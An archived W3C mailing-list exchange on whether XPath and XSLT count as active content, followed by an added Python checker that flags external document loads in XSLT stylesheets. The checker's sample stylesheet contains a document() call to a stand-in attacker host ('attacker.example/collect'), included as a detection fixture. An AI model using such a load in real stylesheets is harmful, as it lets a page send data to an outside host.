Re: XPath/XQuery and all that

(This referred to ACTION-3.  Please make sure you do quote the
action identifier when responding.)
-- 
Thomas Roessler, W3C  <tlr@w3.org>

On 2006-11-15 05:23:01 +0900, Michael(tm) Smith wrote:
> From: "Michael(tm) Smith" <mikes@opera.com>
> To: public-wsc-wg@w3.org
> Date: Wed, 15 Nov 2006 05:23:01 +0900
> Subject: Re: XPath/XQuery and all that
> List-Id: <public-wsc-wg.w3.org>
> X-Archived-At: http://www.w3.org/mid/20061114202300.GI4446@malware
> 
> Stephen Farrell <stephen.farrell@cs.tcd.ie>, 2006-11-14 19:28 +0000:
> 
> > XPath and similar languages are effectively almost programming
> > languages and can therefore potentially badly affect the end
> > user.
> 
> How, exactly? XPath itself is just an addressing mechanism
> that can be used by other languages (such as XSLT). It's not, on
> its own, a Turing-complete programming language as Javascript is.
> 
> I know there are security considerations around XSLT, which has
> a document() function and xsl:import and xsl:include elements
> (which all can potentially enable an XSLT stylesheet to load a
> document from an arbitrary URI).
> 
> > In contrast with Java/Javascript these are less likely
> > to have separate content types or browser settings/controls
> > that the user can set and understand.
> 
> True. There is no "Disable XPath" option in any browser that I
> know of. I think there may not even be a "Disable XSLT" option in
> any of the browsers that have XSLT support.
> 
> > I don't claim to know the answer, but the question relates to
> > these examples of sort-of-active content - should WSC consider
> > these in the same way as Java/Javascript or not? And either way,
> > what's the boundary between passive and active content? (I
> > assume we'll need some description of "active" content that
> > users have to be more careful about.)
> > 
> > These technologies may also be worth considering if we think
> > of the user's machine as a DDoS attack vector. (Attack web
> > server, modify content to include dodgy XPath expressions that
> > attack someone. Innocent browsers rip away.)
> 
> Can you give a specific example of a dodgy XPath expression and
> how it might be used to do something malicious?
> 
>   --Mike
> 
> -- 
> Michael(tm) Smith
> Opera Software, Tokyo
> xmpp:smith@sideshowbarker.net
> irc://irc.freenode.net/mobile-web

Received on Tuesday, 14 November 2006 20:26:00 UTC
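An added example, not code from this thread or from any of its participants, for the point Mike makes about XSLT: document(), xsl:import and xsl:include can make a stylesheet load a document from an arbitrary URI. The check below, written here in Python using only the standard library, parses a stylesheet and reports every load target it can see, labelling each as relative, trusted, external or dynamic, so the stylesheet can be reviewed or rejected before a processor that honours those mechanisms is allowed to apply it. The sample stylesheet, the hostnames (cdn.example.org, attacker.example) and the function names are constructed for this example.

```python
"""Static check for external document loads in an XSLT stylesheet.

Added example for the thread above, not code from the W3C WSC discussion
or from any of its participants. It reports the three load mechanisms
named in the thread (document(), xsl:import, xsl:include) so a
stylesheet can be reviewed before a processor that honours them is
allowed to apply it. The stylesheet, hostnames and function names are
constructed here.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
XSL_IMPORT = f"{{{XSL_NS}}}import"
XSL_INCLUDE = f"{{{XSL_NS}}}include"

# Matches the XPath document() function, e.g. document('http://...') or
# document($uri); group 1 is the raw argument text.
DOCUMENT_CALL = re.compile(r"\bdocument\s*\(\s*([^)]*)\)")

# Constructed stylesheet mixing a relative import, an include from a host
# we choose to trust, a literal off-site document() call, and a
# document() call whose target is only known at run time.
SAMPLE_STYLESHEET = """\
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:import href="base.xsl"/>
  <xsl:include href="http://cdn.example.org/shared.xsl"/>
  <xsl:template match="/">
    <xsl:copy-of select="document('http://attacker.example/collect?x=1')"/>
    <xsl:value-of select="document($target)/foo"/>
  </xsl:template>
</xsl:stylesheet>
"""
TRUSTED_HOSTS = ("cdn.example.org",)  # assumption: hosts we allow loads from


def classify_uri(uri, trusted_hosts):
    """Label a URI as relative, trusted (http(s) to a listed host) or external."""
    parsed = urlparse(uri)
    if not parsed.scheme:
        return "relative"
    if parsed.scheme in ("http", "https") and parsed.hostname in trusted_hosts:
        return "trusted"
    return "external"  # other hosts, and non-http schemes such as file:


def find_external_loads(xslt_text, trusted_hosts=()):
    """Return (mechanism, target, classification) tuples in document order."""
    root = ET.fromstring(xslt_text)
    findings = []
    for elem in root.iter():
        if elem.tag in (XSL_IMPORT, XSL_INCLUDE):
            href = elem.get("href", "")
            mechanism = elem.tag.split("}", 1)[1]
            findings.append((mechanism, href, classify_uri(href, trusted_hosts)))
        # document() can sit in any XPath-bearing attribute (select, test,
        # match) and in attribute value templates, so scan every attribute.
        for value in elem.attrib.values():
            for match in DOCUMENT_CALL.finditer(value):
                arg = match.group(1).strip()
                if len(arg) >= 2 and arg[0] == arg[-1] and arg[0] in "'\"":
                    target = arg[1:-1]
                    label = classify_uri(target, trusted_hosts)
                else:
                    target = arg
                    label = "dynamic"  # computed at run time; cannot be judged statically
                findings.append(("document()", target, label))
    return findings


def should_block(findings):
    """Reject a stylesheet if any load target is off-site or unknown."""
    return any(label in ("external", "dynamic") for _, _, label in findings)


if __name__ == "__main__":
    result = find_external_loads(SAMPLE_STYLESHEET, TRUSTED_HOSTS)
    for mechanism, target, label in result:
        print(f"{label:9} {mechanism:11} {target}")
    print("block:", should_block(result))
```

Running the module lists the four loads in the constructed stylesheet and reports that it should be blocked, because of the literal off-site document() call and the `$target` call that cannot be resolved statically. A static scan of this kind complements, rather than replaces, a processor-side control; in lxml, for instance, `etree.XSLTAccessControl(read_network=False, read_file=False)` passed as `access_control=` to `etree.XSLT` refuses the loads at run time whatever the stylesheet says.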